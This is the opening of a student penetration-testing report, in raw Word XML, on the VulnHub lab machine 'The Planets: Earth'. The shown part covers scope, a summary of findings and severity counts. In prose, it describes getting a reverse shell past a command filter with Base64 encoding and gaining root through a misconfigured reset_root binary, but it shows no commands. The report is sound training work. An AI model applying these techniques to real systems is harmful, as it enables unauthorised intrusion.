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f4761" w:space="10" w:sz="4" w:val="single"/>
          <w:left w:space="0" w:sz="0" w:val="nil"/>
          <w:bottom w:color="0f4761" w:space="10" w:sz="4" w:val="single"/>
          <w:right w:space="0" w:sz="0" w:val="nil"/>
          <w:between w:space="0" w:sz="0" w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="360" w:before="360" w:lineRule="auto"/>
        <w:ind w:left="864" w:right="864" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="0f4761"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Play" w:cs="Play" w:eastAsia="Play" w:hAnsi="Play"/>
          <w:color w:val="0f4761"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TESTING REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0f4761"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0f4761"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration testing report for CTF called The Planets: Earth from VulnHub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A">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B">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C">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D">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E">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F">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0">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1">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2">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3">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A">
      <w:pPr>
        <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:smallCaps w:val="1"/>
          <w:color w:val="156082"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">12 JULY 2026</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:smallCaps w:val="1"/>
          <w:color w:val="156082"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AUTHOR: SZYMON STEFAŃSKI</w:t>
      </w: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Fonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:smallCaps w:val="1"/>
          <w:color w:val="156082"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CLASSIFICATION: EDUCATIONAL</w:t>
      </w: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Fonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:smallCaps w:val="1"/>
          <w:color w:val="156082"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ENVIRONMENT: CONTROLLED ISOLATED LAB</w:t>
      </w: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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="156082"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VERSION: 1.0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.4kb2z7b0sgj4" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement Of Confidentiality</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The contents of this document have been developed by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Szymon Stefański</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a part of the educational path towards penetration tester carrier. This document presents the full process of capturing flags inside of a vulnerable machine called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Planets: Earth</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">All contents of this document that will be used outside of its legal purposes and educational functions will be considered an illegal activity that the author does not take responsibility for.</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id w:val="-694901146"/>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2z7b0sg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Statement Of Confidentiality</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2i5g6sc7r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b2ybkctub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tn8y6376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4ohs6x2g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Overview and Recommendation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5jmvez3dd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Penetration Test Assessment Summary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cxk7n9dv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pb2cslr7b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Compromised System Walkthrough</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kq7c13ah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 Walkthrough</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rruodzx2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Enumeration / information gathering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t9jx79p1j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Exploitation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ayt6kx5e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Post-Exploitation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k32aa38fs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Reproduction of the steps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o5vzxk49yir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Remediation Summary</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23cpuk3z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fz382r3uj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xa2i5g6sc7rc" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This document demonstrates the process of capturing two flags inside of a vulnerable machine called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Planets: Earth</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which can be downloaded from VulnHub.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.nbb2ybkctubt" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Approach</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I performed testing under a „black box” approach on July 9 2026 without any credentials or advance knowledge about source code or the target. Testing was performed using a Kali Linux attack machine inside an isolated host-only network in VirtualBox. The goal was to find the flags inside of the machine through credentials stealing and privilege escalation. Each weakness identified was documented and written down to further explain my way of thinking and approach.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.qrtn8y63767e" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scope </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The scope of this assessment was one internal network range, two local pages and virtual machine access.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1"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4515"/>
            <w:gridCol w:w="4511"/>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B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Host/URL/IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>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C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Overview</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D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.239.7</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E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The Planets: Earth machine IP address</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F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">earth.local</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0">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Main earth’s page</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1">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">terratest.earth.local</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2">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Https test page</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cu4ohs6x2gr8" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment Overview and Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">During the internal penetration test against The Planets: Earth I managed to find several issues that I categorized and described by severity level.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One finding resolved around sensitive directory and file discovery. Using discovery tools like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> I was able to find hidden endpoints that included sensitive information about encryption type, username and data file that was used as a key for encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The second issue was visible and easily accessible data on the main page of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">earth.local</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> page. With information about key and encryption type it reveled to be the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.otrqhdhhvzej" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another finding was possible RCE ( Remote Code Execution ) via the user's shell. Despite a special filter that blocked the simplest reverse shell methods it was insufficient as it could be bypassed using Base64 encoding to deliver reverse shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Last one was privilege escalation via a special script hidden on the user's shell. A custom executable file named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="4f81bd"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reset_root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> had improper permissions that allowed low-privileged users to perform administrative actions and reset root’s password to default leading to full system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.c5jmvez3ddfj" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Test Assessment Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">During testing I started as an unauthenticated user with no such information as configuration information, source code, files or users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.q3cxk7n9dv05" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Summary of Findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">During the course of testing, I uncovered a total of 4 findings that posed a risk for the system of The Planets: Earth. The below table provides a summary of the findings by severity level.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>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3233"/>
        <w:gridCol w:w="2226"/>
        <w:gridCol w:w="3567"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3233"/>
            <w:gridCol w:w="2226"/>
            <w:gridCol w:w="3567"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="20" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="3"/>
            <w:shd w:fill="b6dde8" w:val="clear"/>
            <w:tcMar>
              <w:bottom w:w="0.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="20" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:bottom w:w="0.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="c00000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:bottom w:w="0.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="ee0000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:bottom w:w="0.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="f79646"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="20" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:bottom w:w="0.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:bottom w:w="0.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:bottom w:w="0.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1</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Below is a high-level overview of each finding identified during testing. These findings are covered in depth in the Technical Findings Details section of this report.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>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3008"/>
        <w:gridCol w:w="3009"/>
        <w:gridCol w:w="3009"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3008"/>
            <w:gridCol w:w="3009"/>
            <w:gridCol w:w="3009"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="397" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="c1e4f5" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="c1e4f5" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="c1e4f5" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="397" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
